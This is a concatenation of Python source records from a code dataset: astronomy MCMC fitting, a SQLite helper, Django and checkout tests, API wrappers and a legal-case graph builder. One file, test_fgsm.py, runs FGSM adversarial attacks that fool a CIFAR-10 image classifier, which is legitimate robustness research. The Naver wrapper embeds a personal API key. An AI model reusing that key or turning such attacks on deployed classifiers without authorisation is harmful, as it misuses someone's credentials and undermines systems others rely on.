gr[0, 20] - 0.01\n val = teffs[20]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n xa = ug[0, 24] + 0.01\n ya = gr[0, 24] - 0.01\n val = teffs[24]\n t = ax.annotate(\n \"T = %d K\" % val,\n xy=(xa, ya),\n color=\"r\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n size=\"small\",\n )\n t.set_rotation(0.0)\n\n ax.set_xlabel(\"{}-{}\".format(flux_u.orig_band, flux_g.orig_band))\n ax.set_ylabel(\"{}-{}\".format(flux_g.orig_band, flux_r.orig_band))\n ax.set_xlim([-0.5, 1])\n ax.set_ylim([-0.5, 0.5])\n ax.legend()\n\n plt.savefig(fname)\n plt.show()\n\n print(\"Done!\")\n print(\"-----------------------------------------------\\n\")\n\n\ndef plotFluxes(model, fname=\"fluxplot.pdf\"):\n \"\"\"\n Plot observed fluxes vs model fluxes\n \"\"\"\n model_mags = model.apparent_mags\n model_flx = sdssmag2flux(model_mags)\n # Central wavelengths for the bands\n lambdas = np.array([obs.central_wavelength for obs in model.obs_fluxes])\n obs_flx = [obs.flux for obs in model.obs_fluxes]\n obs_flx_err = [obs.err for obs in model.obs_fluxes]\n\n # Do the actual plotting\n _, ax = plt.subplots(figsize=(5, 5))\n ax.errorbar(\n lambdas,\n model_flx,\n xerr=None,\n yerr=None,\n fmt=\"P\",\n ls=\"none\",\n color=\"darkred\",\n label=\"Modelled apparent flux\",\n markersize=6,\n linewidth=1,\n capsize=None,\n )\n ax.errorbar(\n lambdas,\n obs_flx,\n xerr=None,\n yerr=obs_flx_err,\n fmt=\"o\",\n ls=\"none\",\n color=\"blue\",\n label=\"Observed flux\",\n markersize=6,\n linewidth=1,\n capsize=None,\n )\n ax.set_xlabel(\"Wavelength, nm\")\n ax.set_ylabel(\"Flux, mJy\")\n ax.legend()\n\n plt.tight_layout()\n plt.savefig(fname)\n plt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n LOGFILE = open(\"WDPARAMS.LOGS\", \"w\")\n\n # Allows input file to be passed to code from argument line\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Fit WD Fluxes\")\n parser.add_argument(\"file\", action=\"store\", help=\"input file\")\n args = parser.parse_args()\n\n # Use parseInput function to read data from input file\n input_dict = configobj.ConfigObj(args.file)\n\n # Read information about mcmc, priors, neclipses, sys err\n nburn = int(input_dict[\"nburn\"])\n nprod = int(input_dict[\"nprod\"])\n nthread = int(input_dict[\"nthread\"])\n nwalkers = int(input_dict[\"nwalkers\"])\n scatter = float(input_dict[\"scatter\"])\n thin = int(input_dict[\"thin\"])\n toFit = int(input_dict[\"fit\"])\n\n # Grab the variables\n teff = Param.fromString(\"teff\", input_dict[\"teff\"])\n logg = Param.fromString(\"logg\", input_dict[\"logg\"])\n plax = Param.fromString(\"plax\", input_dict[\"plax\"])\n ebv = Param.fromString(\"ebv\", input_dict[\"ebv\"])\n syserr = float(input_dict[\"syserr\"])\n chain_file = input_dict.get(\"chain\", None)\n\n # Logging\n LOGFILE.write(\"Fitting White Dwarf fluxes to model cooling tracks...\\n\")\n LOGFILE.write(\"Running fit from the following input file:\\n\")\n LOGFILE.write(\"#################################\\n\\n\")\n LOGFILE.write(open(args.file, \"r\").read())\n LOGFILE.write(\"#################################\\n\\n\")\n LOGFILE.write(\"Setting up fluxes...\\n\\n\")\n\n # # # # # # # # # # # #\n # Load in chain file #\n # # # # # # # # # # # #\n if chain_file is None:\n colKeys = []\n fluxes = []\n else:\n print(\"Reading in the chain file,\", chain_file)\n colKeys, chain = read_chain(chain_file)\n print(\"Done!\")\n\n # Extract the fluxes from the chain file, and create a list of Fux objects from that\n chain_bands = [\n key.lower().replace(\"wdflux_\", \"\")\n for key in colKeys\n if \"wdflux\" in key.lower()\n ]\n print(\"I found the following bands in the chain file:\")\n systems = input_dict[\"photometric_systems\"]\n for band in chain_bands:\n print(\"\\t{} ({})\".format(band, systems.get(band, None)))\n print(\"\\n\\n\\n\")\n\n fluxes = []\n for band in chain_bands:\n # TODO: Add KG5 fluxes.\n if band == \"kg5\":\n LOGFILE.write(\"KG5 BANDS ARE CURRENTLY UNUSED. SKIPPING\")\n print(\"KG5 BANDS ARE CURRENTLY UNUSED. SKIPPING\")\n continue\n else:\n key = f\"wdFlux_{band}\"\n if band not in systems:\n msg = f\"No photometric system for {band}, skipping\"\n LOGFILE.write(msg + \"\\n\")\n print(msg)\n continue\n\n system = PhotometricSystem(systems[band])\n mean, _, std = sigma_clipped_stats(chain[key])\n flx = Flux(mean, std, system, band, syserr=syserr)\n print(f\"{band} = {flx}\")\n LOGFILE.write(f\"{band} = {flx}\")\n fluxes.append(flx)\n\n while True:\n print(\"Would you like to add another flux?\")\n cont = input(\"y/n: \")\n if cont.lower() == \"y\":\n print(\"Enter a band:\")\n band = input(\"> \")\n print(\"Enter a photometric system:\")\n system = input(\"> \")\n print(\"Enter a Flux, in mJy\")\n flx = input(\"> \")\n print(\"Enter an error on flux, mJy\")\n fle = input(\"> \")\n\n flx = float(flx)\n fle = float(fle)\n system = PhotometricSystem(system)\n\n flux = Flux(flx, fle, system, band, syserr=syserr)\n fluxes.append(flux)\n else:\n print(\"Done!\")\n break\n\n # Create the model object\n myModel = WDModel(teff, logg, plax, ebv, fluxes)\n npars = myModel.npars\n\n if toFit:\n guessP = np.array(myModel)\n nameList = [\"Teff\", \"log_g\", \"Parallax\", \"E(B-V)\"]\n\n # mp.set_start_method(\"spawn\")\n pool = mp.Pool(nthread)\n p0 = initialise_walkers(guessP, scatter, nwalkers, ln_prior, myModel)\n sampler = emcee.EnsembleSampler(\n nwalkers,\n npars,\n ln_prob,\n args=(myModel,),\n pool=pool,\n )\n\n # burnIn\n pos, prob, state = run_burnin(sampler, p0, nburn)\n\n # production\n sampler.reset()\n col_names = \"walker_no \" + \" \".join(nameList) + \" ln_prob\"\n sampler = run_mcmc_save(\n sampler, pos, nprod, state, \"chain_wd.txt\", col_names=col_names\n )\n # Collect results from all walkers\n fchain = flatchain(sampler.chain, npars, thin=thin)\n\n # Plot the likelihoods\n likes = sampler.chain[..., -1]\n\n # Plot the mean likelihood evolution\n like_mu = np.mean(likes, axis=0)\n like_std = np.std(likes, axis=0)\n steps = np.arange(likes.shape[1])\n std = np.std(likes)\n\n # Make the likelihood plot\n fig, ax = plt.subplots(figsize=(11, 8))\n ax.fill_between(\n steps, like_mu - like_std, like_mu + like_std, color=\"red\", alpha=0.4\n )\n ax.plot(steps, like_mu, color=\"green\")\n\n ax.set_xlabel(\"Step\")\n ax.set_ylabel(\"ln_prob\")\n\n plt.tight_layout()\n plt.savefig(\"wdparams_likelihoods.pdf\")\n plt.close(\"all\")\n\n bestPars = []\n print(fchain.shape)\n for i in range(npars):\n par = fchain[:, i]\n lolim, best, uplim = np.percentile(par, [16, 50, 84])\n myModel[i] = best\n\n print(\"%s = %f +%f -%f\" % (nameList[i], best, uplim - best, best - lolim))\n bestPars.append(best)\n print(\"Creating corner plots...\")\n fig = thumbPlot(fchain, nameList)\n fig.savefig(\"wdparams_cornerPlot.pdf\")\n plt.close(\"all\")\n else:\n bestPars = [par for par in myModel]\n\n print(\"Done!\")\n print(\"Chisq = {:.3f}\".format(myModel.chisq()))\n # Plot measured and model colors and fluxes\n plotFluxes(myModel)\n print(\"Model: {}\".format(myModel))\n LOGFILE.close()\n","sub_path":"wdparams.py","file_name":"wdparams.py","file_ext":"py","file_size_in_byte":22678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"31187436","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\nfrom keras.datasets.cifar10 import load_data\n\nfrom ares import FGSM, CrossEntropyLoss\nfrom ares.model.loader import load_model_from_path\n\nbatch_size = 100\n\nsession = tf.Session()\n\nmodel_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../example/cifar10/resnet56.py')\nrs_model = load_model_from_path(model_path)\nmodel = rs_model.load(session)\n\n_, (xs_test, ys_test) = load_data()\nxs_test = (xs_test / 255.0) * (model.x_max - model.x_min) + model.x_min\nys_test = ys_test.reshape(len(ys_test))\n\nxs_ph = tf.placeholder(model.x_dtype, shape=(batch_size, *model.x_shape))\nlgs, lbs = model.logits_and_labels(xs_ph)\n\nloss = CrossEntropyLoss(model)\nattack = FGSM(\n model=model,\n batch_size=batch_size,\n loss=loss,\n goal='ut',\n distance_metric='l_inf',\n session=session\n)\nattack.config(magnitude=8.0 / 255.0)\n\nfor hi in range(batch_size, 5 * batch_size, batch_size):\n xs = xs_test[hi - batch_size:hi]\n ys = ys_test[hi - batch_size:hi]\n\n xs_adv = attack.batch_attack(xs, ys=ys)\n\n lbs_pred = session.run(lbs, feed_dict={xs_ph: xs})\n lbs_adv = session.run(lbs, feed_dict={xs_ph: xs_adv})\n\n print(\n np.equal(ys, lbs_pred).astype(np.float).mean(),\n np.equal(ys, lbs_adv).astype(np.float).mean()\n )\n\nattack.config(\n magnitude=np.concatenate((np.ones(50) * 1.0 / 255.0, np.ones(50) * 8.0 / 255.0)),\n)\n\nfor hi in range(batch_size, 5 * batch_size, batch_size):\n xs = xs_test[hi - batch_size:hi]\n ys = ys_test[hi - batch_size:hi]\n\n xs_adv = attack.batch_attack(xs, ys, None)\n\n lbs_pred = session.run(lbs, feed_dict={xs_ph: xs})\n lbs_adv = session.run(lbs, feed_dict={xs_ph: xs_adv})\n\n print(\n np.equal(ys, lbs_pred).astype(np.float).mean(),\n np.equal(ys, lbs_adv).astype(np.float).mean()\n )\n","sub_path":"test/test_fgsm.py","file_name":"test_fgsm.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"229457633","text":"import sqlite3\nfrom models.hero import Hero\nfrom models.talent import Talent\nfrom models.ability import Ability\nfrom models.affect import Affect\n\nclass DbHelper(object):\n def __init__(self, db_path='HotsTalents.sqlite'):\n self.connection = sqlite3.connect(db_path)\n\n def close(self):\n if self.connection:\n self.connection.close()\n\n def get_hero_list(self):\n result = []\n query = 'SELECT name FROM heroes'\n cursor = self.connection.cursor()\n rows = cursor.execute(query).fetchall()\n cursor.close()\n for row in rows:\n result.append(row[0])\n return result\n\n def find_hero_by_name(self, name):\n query = 'SELECT * FROM heroes WHERE name=?'\n\n return self.hero_from_row(self.fetch_row_by_key(query, name))\n\n def get_talent_list(self, hero_id):\n result = []\n query = 'SELECT * FROM talents WHERE hero_id=?'\n rows = self.fetch_list_by_key(query, hero_id)\n for row in rows:\n result.append(self.talent_from_row(row))\n return result\n\n def get_ability_list(self, hero_id):\n result = []\n query = 'SELECT * FROM ability WHERE hero=?'\n rows = self.fetch_list_by_key(query, hero_id)\n for row in rows:\n result.append(self.ability_from_row(row))\n return result\n\n def create_hero(self, hero):\n hero.id = self.get_next_hero_id()\n query = 'INSERT INTO heroes VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.id, hero.name, hero.hero_type, hero.range, hero.base_hp, hero.base_mana,\n hero.base_hp_regen, hero.base_mana_regen, hero.base_speed, hero.base_attack,\n hero.base_attack_speed, hero.splash_attack, hero.portrait, hero.larger_protrait,\n hero.hero_image, hero.level_hp, hero.level_mana, hero.level_hp_regen,\n hero.level_mana_regen, hero.level_attack, hero.level_splash_attack))\n self.connection.commit()\n cursor.close()\n return hero\n\n def update_hero(self, hero):\n hero.id = self.get_hero_id(hero)\n query = 'UPDATE heroes SET hero_type=?, range=?, base_hp=?, base_mana=?, base_hp_regen=?, base_mana_regen=?, ' \\\n 'base_speed=?, base_attack=?, base_attack_speed=?, splash_attack=?, portrait_id=?, larger_portrait_id=?,' \\\n ' hero_image_id=?, level_hp=?, level_mana=?, level_hp_regen=?, level_mana_regen=?, level_attack=?, ' \\\n 'level_splash_attack=? WHERE _id=?'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.hero_type, hero.range, hero.base_hp, hero.base_mana, hero.base_hp_regen,\n hero.base_mana_regen, hero.base_speed, hero.base_attack, hero.base_attack_speed,\n hero.splash_attack, hero.portrait, hero.larger_protrait, hero.hero_image, hero.level_hp,\n hero.level_mana, hero.level_hp_regen, hero.level_mana_regen, hero.level_attack,\n hero.level_splash_attack, hero.id))\n self.connection.commit()\n cursor.close()\n\n def get_next_hero_id(self):\n query = 'SELECT max(_id) FROM heroes'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_next_ability_id(self):\n query = 'SELECT max(_id) FROM ability'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_next_talent_id(self):\n query = 'SELECT max(_id) FROM talents'\n cursor = self.connection.cursor()\n result = cursor.execute(query).fetchone()[0]\n cursor.close()\n return result+1\n\n def get_hero_id(self, hero):\n query = 'SELECT _id FROM heroes WHERE name=?'\n cursor = self.connection.cursor()\n cursor.execute(query, (hero.name,))\n result = cursor.fetchone()[0]\n cursor.close()\n return result\n\n def get_talent_by_id(self, talent_id):\n query = 'SELECT * FROM talents WHERE _id=?'\n return self.talent_from_row(self.fetch_row_by_key(query, talent_id))\n\n def get_ability_by_id(self, ability_id):\n query = 'SELECT * FROM ability WHERE _id=?'\n return self.ability_from_row(self.fetch_row_by_key(query, ability_id))\n\n def get_affects_by_talent(self, talent_id):\n result = []\n query = 'SELECT * FROM talent_affect WHERE talent_id=?'\n rows = self.fetch_list_by_key(query, talent_id)\n for row in rows:\n affect = Affect()\n affect.affecting_talent = self.get_talent_by_id(talent_id)\n if row[2] is not None:\n affect.affected_ability = self.get_ability_by_id(row[2])\n if row[3] is not None:\n affect.affected_talent = self.get_talent_by_id(row[3])\n result.append(affect)\n return result\n\n def delete_ability(self, ability):\n query = 'DELETE FROM ability WHERE _id=?'\n self.execute_query_with_key(query, ability.id, True)\n\n def delete_talent(self, talent):\n delete_affects_query = 'DELETE FROM talent_affect WHERE talent_id=?'\n self.execute_query_with_key(delete_affects_query, talent.id, True)\n delete_talent_query = 'DELETE FROM talents WHERE _id=?'\n self.execute_query_with_key(delete_talent_query, talent.id, True)\n\n def add_ability(self, ability):\n query = 'INSERT INTO ability VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)'\n ability.id = self.get_next_ability_id()\n if ability.is_trait:\n is_trait = 1\n else:\n is_trait = 0\n self.execute_query_with_key(query, (ability.id, ability.name,\n ability.hero_id, ability.icon, ability.description,\n ability.mana_cost, ability.cooldown, ability.duration,\n is_trait), True)\n return ability\n\n def add_talent(self, talent):\n query = 'INSERT INTO talents VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)'\n talent.id = self.get_next_talent_id()\n if talent.is_usable:\n is_usable = 1\n else:\n is_usable = 0\n self.execute_query_with_key(query, (talent.id, talent.name, talent.hero_id,\n talent.icon, talent.description, talent.mana_cost,\n talent.cooldown, talent.duration, talent.sort_order,\n talent.level_required, is_usable), True)\n return talent\n\n def update_talent(self, talent):\n if talent.is_usable:\n is_usable = 1\n else:\n is_usable = 0\n query = 'UPDATE talents SET name=?, icon=?, description=?, mana_cost=?, cooldown=?, duration=?, sort_order=?, ' \\\n 'level_required=?, is_usable=? WHERE _id=?'\n self.execute_query_with_key(query, (talent.name, talent.icon, talent.description, talent.mana_cost,\n talent.cooldown, talent.duration, talent.sort_order, talent.level_required,\n is_usable, talent.id), True)\n\n def update_ability(self, ability):\n if ability.is_trait:\n is_trait = 1\n else:\n is_trait = 0\n query = 'UPDATE ability SET name=?, icon=?, description=?, mana_cost=?, cooldown=?, duration=?, is_trait=? ' \\\n 'WHERE _id=?'\n self.execute_query_with_key(query, (ability.name, ability.icon, ability.description, ability.mana_cost,\n ability.cooldown, ability.duration, is_trait, ability.id), True)\n\n def update_affects(self, affect_list, skill):\n delete_affects = 'DELETE FROM talent_affect WHERE talent_id=?'\n new_affects = 'INSERT INTO talent_affect(talent_id, affected_ability_id, affected_talent_id) VALUES(?, ?, ?)'\n self.execute_query_with_key(delete_affects, skill.id, True)\n for affect in affect_list:\n if affect.affected_ability is None:\n ability = None\n else:\n ability = affect.affected_ability.id\n if affect.affected_talent is None:\n talent = None\n else:\n talent = affect.affected_talent.id\n if talent is None and ability is None:\n continue\n self.execute_query_with_key(new_affects, (affect.affecting_talent.id, ability, talent), True)\n\n def execute_query_with_key(self, query, key, commit=False):\n cursor = self.connection.cursor()\n if isinstance(key, tuple):\n cursor.execute(query, key)\n else:\n cursor.execute(query, (key, ))\n if commit:\n self.connection.commit()\n cursor.close()\n\n def fetch_row_by_key(self, query, key):\n cursor = self.connection.cursor()\n if isinstance(key, tuple):\n cursor.execute(query, key)\n else:\n cursor.execute(query, (key, ))\n row = cursor.fetchone()\n cursor.close()\n return row\n\n def fetch_list_by_key(self, query, key):\n cursor = self.connection.cursor()\n cursor.execute(query, (key, ))\n rows = cursor.fetchall()\n cursor.close()\n return rows\n\n @staticmethod\n def talent_from_row(row):\n talent = Talent()\n talent.id = row[0]\n talent.name = row[1]\n talent.hero_id = row[2]\n talent.icon = row[3]\n talent.description = row[4]\n talent.mana_cost = row[5]\n talent.cooldown = row[6]\n talent.duration = row[7]\n talent.sort_order = row[8]\n talent.level_required = row[9]\n if row[10] > 0:\n talent.is_usable = True\n else:\n talent.is_usable = False\n return talent\n\n @staticmethod\n def ability_from_row(row):\n ability = Ability()\n ability.id = row[0]\n ability.name = row[1]\n ability.hero_id = row[2]\n ability.icon = row[3]\n ability.description = row[4]\n ability.mana_cost = row[5]\n ability.cooldown = row[6]\n ability.duration = row[7]\n if row[8] is not None and row[8] > 0:\n ability.is_trait = True\n else:\n ability.is_trait = False\n return ability\n\n @staticmethod\n def hero_from_row(row):\n result = Hero()\n result.id = row[0]\n result.name = row[1]\n result.hero_type = row[2]\n result.range = row[3]\n result.base_hp = row[4]\n result.base_mana = row[5]\n result.base_hp_regen = row[6]\n result.base_mana_regen = row[7]\n result.base_speed = row[8]\n result.base_attack = row[9]\n result.base_attack_speed = row[10]\n result.splash_attack = row[11]\n result.portrait = row[12]\n result.larger_protrait = row[13]\n result.hero_image = row[14]\n result.level_hp = row[15]\n result.level_mana = row[16]\n result.level_hp_regen = row[17]\n result.level_mana_regen = row[18]\n result.level_attack = row[19]\n result.level_splash_attack = row[20]\n\n return result","sub_path":"db_helper.py","file_name":"db_helper.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286825184","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport journal.views\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n\turl(r'^journal/', include('journal.urls')),\n\turl(r'^accounts/', include('accounts.urls')),\n\turl(r'^$', include('journal.urls')),\n)\n","sub_path":"running_journal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191309562","text":"from decimal import Decimal as D\nfrom django.contrib.auth.models import User\nfrom rest_framework import status\nfrom rest_framework.reverse import reverse\nfrom oscar.core.loading import get_model\nfrom oscar.test import factories\nimport mock\n\nfrom .base import BaseTest\nfrom . import responses\n\nAccount = get_model('oscar_accounts', 'Account')\n\n\nclass CheckoutTest(BaseTest):\n \"\"\"Full Integration Test of Checkout\"\"\"\n\n @mock.patch('soap.get_transport')\n def test_checkout_authd(self, get_transport):\n \"\"\"Full checkout process using minimal api calls\"\"\"\n get_transport.return_value = self._build_transport_with_reply(responses.transaction_successful)\n\n user = User.objects.create_user(username='joe', password='schmoe')\n self.client.login(username='joe', password='schmoe')\n\n product = self._create_product()\n\n res = self._get_basket()\n self.assertEqual(res.status_code, 200)\n basket_id = res.data['id']\n\n res = self._add_to_basket(product.id)\n self.assertEqual(res.status_code, 200)\n\n account = self._build_account('9999999999999999')\n account.primary_user = user\n account.save()\n\n resp = self._checkout(basket_id, account)\n self.assertEqual(resp.data['total_incl_tax'], '10.00')\n\n self.assertEqual(resp.data['shipping_method'], 'Free shipping')\n\n\n def _create_product(self, price=D('10.00')):\n product = factories.create_product(\n title='My Product',\n product_class='My Product Class')\n record = factories.create_stockrecord(\n currency='USD',\n product=product,\n num_in_stock=10,\n price_excl_tax=price)\n factories.create_purchase_info(record)\n return product\n\n def _get_basket(self):\n url = reverse('api-basket')\n return self.client.get(url)\n\n def _add_to_basket(self, product_id, quantity=1):\n url = reverse('api-basket-add-product')\n data = {\n \"url\": reverse('product-detail', args=[product_id]),\n \"quantity\": quantity\n }\n return self.client.post(url, data)\n\n def _checkout(self, basket_id, account):\n data = {\n \"guest_email\": \"herp@example.com\",\n \"basket\": reverse('basket-detail', args=[basket_id]),\n \"wfrs_source_account\": account.pk,\n \"shipping_address\": {\n \"first_name\": \"Joe\",\n \"last_name\": \"Schmoe\",\n \"line1\": \"234 5th Ave\",\n \"line4\": \"Manhattan\",\n \"postcode\": \"10001\",\n \"state\": \"NY\",\n \"country\": reverse('country-detail', args=['US']),\n \"phone_number\": \"+1 (717) 467-1111\",\n }\n }\n url = reverse('wfrs-api-checkout')\n res = self.client.post(url, data, format='json')\n self.assertEqual(res.status_code, 200)\n return res\n","sub_path":"wellsfargo/tests/test_api_checkout.py","file_name":"test_api_checkout.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"447280603","text":"from distutils.core import setup\n\nwith open('requirements.txt') as file:\n required = file.read().splitlines()\n\nsetup(\n name='pypiWrapper',\n version='0.1.1',\n packages=['pypiWrapper'],\n license='MIT',\n author='Niek Keijzer',\n author_email='info@niekkeijzer.com',\n description='Wrapper for PyPI API',\n url='https://github.com/NiekKeijzer/pypiWrapper',\n download_url='https://github.com/NiekKeijzer/pypiWrapper/tarball/0.1.1',\n keywords=\"pypi json api wrapper\",\n install_required=required\n)\n","sub_path":"pypi_install_script/pypiWrapper-0.1.1/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"41627553","text":"import urllib\nimport elementtree.ElementTree as ET\n\n# http://openapi.naver.com/\nclass NaverOpenAPI(object):\n\n # Seo Sanghyeon's key. Naver ID sanxiyn.\n defaultKey = 'b2730786365fd6614977e2a4ae265b91'\n\n def __init__(self, key=None):\n if key:\n self.key = key\n else:\n self.key = self.defaultKey\n\n # http://openapi.naver.com/page.nhn?PageId=1_06\n def book(self, isbn):\n query = {}\n query['key'] = self.key\n query['target'] = 'book_adv'\n query['query'] = ''\n query['d_isbn'] = isbn\n url = 'http://openapi.naver.com/search?' + urllib.urlencode(query)\n tree = ET.parse(urllib.urlopen(url))\n element = tree.find('channel/item')\n if element is not None:\n return NaverBook(element)\n\nclass NaverBook(object):\n\n def __init__(self, element):\n self.element = element\n\n def get(self, tagname):\n element = self.element.find(tagname)\n if element is not None:\n return element.text.strip()\n\n def cover(self):\n return self.get('image')\n\n def title(self):\n return self.get('title')\n\n def date(self):\n pubdate = self.get('pubdate')\n pubyear = pubdate[:4]\n return pubyear\n\n def publication(self):\n publisher = self.get('publisher')\n pubyear = self.date()\n publication = '%s (%s)' % (publisher, pubyear)\n return publication\n","sub_path":"naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641193103","text":"from .node_base import Node_Base\n\nfrom homie.node.property.property_datetime import Property_DateTime\n\n\nclass Node_DateTime(Node_Base):\n def __init__(\n self,\n device,\n id=\"datetime\",\n name=\"DateTime\",\n type_=\"datetime\",\n retain=True,\n qos=1,\n set_datetime=None,\n ):\n super().__init__(device, id, name, type_, retain, qos)\n\n assert set_datetime # must provide a function to set the value of the datetime\n\n self.add_property(Property_DateTime(self, set_value=set_datetime))\n\n def update_datetime(self, dt):\n self.get_property(\"datetime\").value = dt\n\n","sub_path":"homie/node/node_datetime.py","file_name":"node_datetime.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"9480239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8\n# ----------------------------------------------------------------------\n# Label sentences\n# ----------------------------------------------------------------------\n# Ivan Vladimir Meza-Ruiz/ ivanvladimir at turing.iimas.unam.mx\n# 2017/IIMAS/UNAM\n# ----------------------------------------------------------------------\n\n# System libraries\nimport argparse\nimport os.path\nimport re\nfrom tinydb import TinyDB, Query\nimport xml.etree.ElementTree as ET\nfrom collections import Counter, OrderedDict\nimport json\nfrom py2neo import Graph, Node, Relationship\nimport config\nimport sys\n\nre_year = re.compile(\"\\d\\d\\d\\d\")\nre_pais = re.compile(r\".*\\.([^.]*)$\")\n\n\nclass fg:\n BLACK = '\\033[30m'\n RED = '\\033[31m'\n GREEN = '\\033[32m'\n YELLOW = '\\033[33m'\n BLUE = '\\033[34m'\n MAGENTA = '\\033[35m'\n CYAN = '\\033[36m'\n WHITE = '\\033[37m'\n RESET = '\\033[39m'\n\n\nclass bg:\n BLACK = '\\033[40m'\n RED = '\\033[41m'\n GREEN = '\\033[42m'\n YELLOW = '\\033[43m'\n BLUE = '\\033[44m'\n MAGENTA = '\\033[45m'\n CYAN = '\\033[46m'\n WHITE = '\\033[47m'\n RESET = '\\033[49m'\n\n\nclass style:\n BRIGHT = '\\033[1m'\n DIM = '\\033[2m'\n NORMAL = '\\033[22m'\n RESET = '\\033[0m'\n\n\n\n\n\ndef build_graph(data,id2title):\n nodes=[]\n nodes_={}\n for idd,(name,node) in enumerate(data[0].items()):\n if 'type' in node and node['type']==\"institution\":\n continue\n nodes.append({\"name\":name,\n \"id\":idd,\n \"type\":2})\n for k,v in node.items():\n nodes[-1][k]=v\n\n nodes_[name]=idd\n\n len_nodes=len(nodes)\n for idd,(name,node) in enumerate(data[2].items()):\n if 'type' in node and node['type']==\"institution\":\n continue\n bits=name.split(\":\",2)\n nodes.append({\"name\":name,\n \"doc\":bits[0],\n \"art\":bits[1],\n \"id\":idd+len_nodes,\n \"type\":3})\n nodes_[name]=idd+len_nodes\n\n links=[]\n linked = set()\n for d1,c in data[1].items():\n for d2,val in c.items():\n if val > 0:\n ori_val=val\n tpe = \"normal\"\n if d2[1]==\"case_cidh\":\n target=nodes_[id2title[d2[0]]]\n val=val*50\n tpe = \"cidh\"\n else:\n target=nodes_[d2[0]]\n links.append({\"source\":nodes_[d1],\n \"target\":target,\n \"value\":val,\n \"ori_val\":ori_val,\n \"type\": tpe\n })\n linked.add(nodes_[d1])\n linked.add(target)\n\n for d1,c in data[3].items():\n for d2,val in c.items():\n if val > 0:\n ori_val=val\n tpe = \"artcle\"\n target=nodes_[\"{0}:{1}\".format(d2[0],d2[2])]\n links.append({\"source\":nodes_[d1],\n \"target\":target,\n \"value\":val,\n \"ori_val\":ori_val,\n \"type\": tpe\n })\n linked.add(nodes_[d1])\n linked.add(target)\n\n for node in nodes:\n if not 'id' in node:\n print(node)\n\n return None\n\ndef get_info_node(doc,artn=None):\n if artn:\n return (\n doc.attrib['name'],\n doc.attrib['type'],\n artn\n )\n else:\n return (\n doc.attrib['name'],\n doc.attrib['type']\n )\n\n\ndef extract_graph(root,graph,case,data):\n node_case=Node(\"Case\",**data[0][case['title']])\n graph.create(node_case)\n for par in root.findall('.//paragraph'):\n # Shows some labelling in the document\n for doc in par.findall('.//DocumentMention'):\n if not doc.attrib['type']==\"case_cidh\":\n node_document=Node(\"Document\",**doc.attrib)\n graph.create(node_document)\n cite=Relationship(node_case,'CITES',node_document)\n graph.create(cite)\n\n for art in par.findall('.//ArticleMention[@document=\"{0}\"]'\n .format(doc.attrib['id'])):\n for artn in art.attrib['articles'].split():\n node_article=Node(\"Article\",**art.attrib)\n graph.create(node_article)\n mention=Relationship(node_document,'MENTION',node_article)\n graph.create(mention)\n\n return data\n\n# MAIN\nif __name__ == \"__main__\":\n # Command line options\n p = argparse.ArgumentParser(description=\"Extracti articles\")\n p.add_argument(\"--re_selector\",\n default=\".*\", type=str, action=\"store\", dest=\"re_selector\",\n help=\"ER to select files\")\n p.add_argument(\"--labelled_dir\",\n default=\"data/labelledDocuments\", type=str,\n action=\"store\", dest=\"labelled_dir\",\n help=\"Directory with the annotated documents\")\n p.add_argument(\"--graph\",\n default=\"bolt://127.0.0.1:7687\", type=str,\n action=\"store\", dest=\"graph\",\n help=\"Graph db\")\n p.add_argument(\"--dbname\",\n default=\"data/DB.json\", type=str,\n action=\"store\", dest=\"dbname\",\n help=\"Name for the db file\")\n p.add_argument(\"-n\", \"--new\",\n action=\"store_true\", dest=\"new\",\n help=\"New graph [Off]\")\n p.add_argument(\"-v\", \"--verbose\",\n action=\"store_true\", dest=\"verbose\",\n help=\"Verbose mode [Off]\")\n\n # Parsing commands line arguments\n args = p.parse_args()\n\n # Defining verbose function\n if args.verbose:\n def verbose(*args):\n print(args[0], end=\"\", sep=\"\")\n print(args[1], end=\"\", sep=\"\")\n print(style.NORMAL, end=\"\")\n for a in args[2:]:\n print(a, end=\"\")\n print(style.RESET)\n else:\n def verbose(*args):\n return None\n\n # Loading grpah\n graph = Graph(args.graph, auth=(config.NEO4J_USER, config.NEO4J_PASSWORD))\n\n\n # Connecting to DB\n verbose(style.BRIGHT, \"Connecting to DB: \", args.dbname)\n db = TinyDB(args.dbname)\n contensiosos = 